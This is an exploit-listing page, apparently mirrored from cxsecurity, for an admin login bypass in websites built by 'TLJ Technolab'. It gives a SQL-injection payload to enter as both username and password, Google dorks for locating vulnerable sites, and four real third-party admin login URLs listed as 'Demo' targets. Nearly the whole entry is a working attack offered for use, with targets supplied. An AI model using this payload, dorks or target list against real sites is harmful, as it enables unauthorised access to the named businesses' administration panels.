Advertisement






MANAGE BY TLJ TECHNOLAB - Admin Panel Bypass

CVE Category Price Severity
N/A CWE-287 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2021-02-07
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020019

Below is a copy:

MANAGE BY TLJ TECHNOLAB - Admin Panel Bypass
|[+] Exploit Title: MANAGE BY TLJ TECHNOLAB - Admin Panel Bypass

|[+] Exploit Author:  YangMangChun 

|[+] Tested on: Windows 10 Firefox


|[+] Google Dork:intext:"MANAGE BY : TLJ TECHNOLAB"
|[+] Google Dork:intext:"Designed By : TLJ Technolab"
           

|[+] Vendor site: http://tljtechnolab.in

|[+] PoC

username: admin' or '1'#
password: admin' or '1'#


|[+] Demo: 

http://tljtechnolab.in/admin_tlj_technolab/login.php

http://skm-india.com/admin_skm/login.php

https://www.hmen.in/admin_hmen/login.php

https://sparkenterprise.in/admin_sparkenterprise/login.php


|[+] : Telegram ID:@wolfwolfing



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.